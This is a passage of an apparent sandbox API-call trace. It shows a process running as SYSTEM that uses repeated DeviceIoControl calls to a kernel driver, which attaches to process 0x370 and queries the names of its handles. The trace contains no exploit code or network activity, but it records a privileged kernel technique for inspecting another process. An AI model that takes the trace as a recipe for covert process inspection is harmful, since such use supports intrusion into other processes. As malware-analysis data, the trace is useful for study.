TokenHandle=0xfffffa8001fcd600*=0xc4) returned 0x0 [0139.699] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0139.699] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.699] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0139.699] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0139.702] CloseHandle (hObject=0xc4) returned 1 [0139.702] CloseHandle (hObject=0xc8) returned 1 [0139.702] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.702] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0139.702] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.702] PsAcquireProcessExitSynchronization () returned 0x0 [0139.702] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.702] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800382cd00, HandleInformation=0x0) returned 0x0 [0139.702] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.703] PsReleaseProcessExitSynchronization () returned 0x2 [0139.703] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.703] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c7044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.703] ObfDereferenceObject (Object=0xfffffa800382cd00) returned 0x1 [0139.703] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.703] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.703] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0139.703] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.703] PsAcquireProcessExitSynchronization () returned 0x0 [0139.703] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.703] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003831a60, HandleInformation=0x0) returned 0x0 [0139.703] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.703] PsReleaseProcessExitSynchronization () returned 0x2 [0139.703] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.704] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002ee8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ee8044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.704] ObfDereferenceObject (Object=0xfffffa8003831a60) returned 0x1 [0139.704] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.704] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.704] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.704] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0139.704] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.704] PsAcquireProcessExitSynchronization () returned 0x0 [0139.704] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.704] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0139.704] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.704] PsReleaseProcessExitSynchronization () returned 0x2 [0139.704] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.704] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.704] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0139.704] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.705] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.705] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.705] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0139.705] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.705] PsAcquireProcessExitSynchronization () returned 0x0 [0139.705] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.705] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ab57b0, HandleInformation=0x0) returned 0x0 [0139.705] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.705] PsReleaseProcessExitSynchronization () returned 0x2 [0139.705] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.705] ObQueryNameString (in: Object=0xfffff8a000ab57b0, ObjectNameInfo=0xfffffa8002f85044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f85044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.705] ObfDereferenceObject (Object=0xfffff8a000ab57b0) returned 0x2 [0139.705] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.705] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.705] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.705] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0139.706] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.706] PsAcquireProcessExitSynchronization () returned 0x0 [0139.706] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.706] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0139.706] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.706] PsReleaseProcessExitSynchronization () returned 0x2 [0139.706] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.706] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002f84044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f84044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.706] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0139.706] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.706] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.706] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.706] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0139.706] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.706] PsAcquireProcessExitSynchronization () returned 0x0 [0139.707] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.707] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00135e760, HandleInformation=0x0) returned 0x0 [0139.707] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.707] PsReleaseProcessExitSynchronization () returned 0x2 [0139.707] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.707] ObQueryNameString (in: Object=0xfffff8a00135e760, ObjectNameInfo=0xfffffa8002f83044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f83044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.707] ObfDereferenceObject (Object=0xfffff8a00135e760) returned 0x4 [0139.707] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.707] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.707] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.707] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0139.707] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.707] PsAcquireProcessExitSynchronization () returned 0x0 [0139.707] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.707] ObReferenceObjectByHandle (in: Handle=0x2cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0139.707] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.708] PsReleaseProcessExitSynchronization () returned 0x2 [0139.708] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.708] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f80044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f80044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.708] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0139.708] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.708] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.708] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.708] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0139.708] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.708] PsAcquireProcessExitSynchronization () returned 0x0 [0139.708] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.708] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003692340, HandleInformation=0x0) returned 0x0 [0139.708] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.708] PsReleaseProcessExitSynchronization () returned 0x2 [0139.708] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.708] ObQueryNameString (in: Object=0xfffffa8003692340, ObjectNameInfo=0xfffffa8002f7f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7f044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.708] ObfDereferenceObject (Object=0xfffffa8003692340) returned 0x1 [0139.708] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.709] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.709] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.709] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0139.709] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.709] PsAcquireProcessExitSynchronization () returned 0x0 [0139.709] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.709] ObReferenceObjectByHandle (in: Handle=0x3bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800368f190, HandleInformation=0x0) returned 0x0 [0139.709] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.709] PsReleaseProcessExitSynchronization () returned 0x2 [0139.709] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.709] ObQueryNameString (in: Object=0xfffffa800368f190, ObjectNameInfo=0xfffffa8002f7e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7e044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.709] ObfDereferenceObject (Object=0xfffffa800368f190) returned 0x1 [0139.709] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.709] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.709] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.709] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0139.709] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.709] PsAcquireProcessExitSynchronization () returned 0x0 [0139.710] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.710] ObReferenceObjectByHandle (in: Handle=0x480, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036d43c0, HandleInformation=0x0) returned 0x0 [0139.710] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.710] PsReleaseProcessExitSynchronization () returned 0x2 [0139.710] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.710] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f7d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f7d044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.710] ObfDereferenceObject (Object=0xfffffa80036d43c0) returned 0x12 [0139.710] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.710] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.710] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.710] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0139.710] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.710] PsAcquireProcessExitSynchronization () returned 0x0 [0139.710] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.710] ObReferenceObjectByHandle (in: Handle=0x498, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036ca3d0, HandleInformation=0x0) returned 0x0 [0139.710] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.710] PsReleaseProcessExitSynchronization () returned 0x2 [0139.710] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.710] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003000044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003000044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.710] ObfDereferenceObject (Object=0xfffffa80036ca3d0) returned 0x1 [0139.711] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.711] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.711] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.711] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0139.711] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.711] PsAcquireProcessExitSynchronization () returned 0x0 [0139.711] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0139.711] ObReferenceObjectByHandle (in: Handle=0x49c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036c8730, HandleInformation=0x0) returned 0x0 [0139.711] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.711] PsReleaseProcessExitSynchronization () returned 0x2 [0139.711] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1cf [0139.711] ObQueryNameString (in: Object=0xfffffa80036c8730, ObjectNameInfo=0xfffffa8003001044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003001044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.711] ObfDereferenceObject (Object=0xfffffa80036c8730) returned 0x1 [0139.711] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.345] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.345] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.345] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0140.345] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.345] PsAcquireProcessExitSynchronization () returned 0x0 [0140.345] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.345] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036c8070, HandleInformation=0x0) returned 0x0 [0140.345] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.345] PsReleaseProcessExitSynchronization () returned 0x2 [0140.345] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.346] ObQueryNameString (in: Object=0xfffffa80036c8070, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0140.346] ObfDereferenceObject (Object=0xfffffa80036c8070) returned 0x2 [0140.346] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.346] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.346] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.346] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0140.346] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.346] PsAcquireProcessExitSynchronization () returned 0x0 [0140.346] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.346] ObReferenceObjectByHandle (in: Handle=0x4a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e6f070, HandleInformation=0x0) returned 0x0 [0140.347] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.347] PsReleaseProcessExitSynchronization () returned 0x2 [0140.347] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.347] ObQueryNameString (in: Object=0xfffffa8002e6f070, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.347] ObfDereferenceObject (Object=0xfffffa8002e6f070) returned 0x2 [0140.347] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0140.347] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0140.347] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0140.347] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0140.347] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0140.348] PsAcquireProcessExitSynchronization () returned 0x0 [0140.348] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0140.348] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036ce730, HandleInformation=0x0) returned 0x0 [0140.348] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0140.348] PsReleaseProcessExitSynchronization () returned 0x2 [0140.348] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d0 [0140.348] ObQueryNameString (in: Object=0xfffffa80036ce730, ObjectNameInfo=0xfffffa8002f85044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f85044, ReturnLength=0xfffff88005163550) returned 0x0 [0140.348] ObfDereferenceObject (Object=0xfffffa80036ce730) returned 0x1 [0140.348] IofCompleteRequest 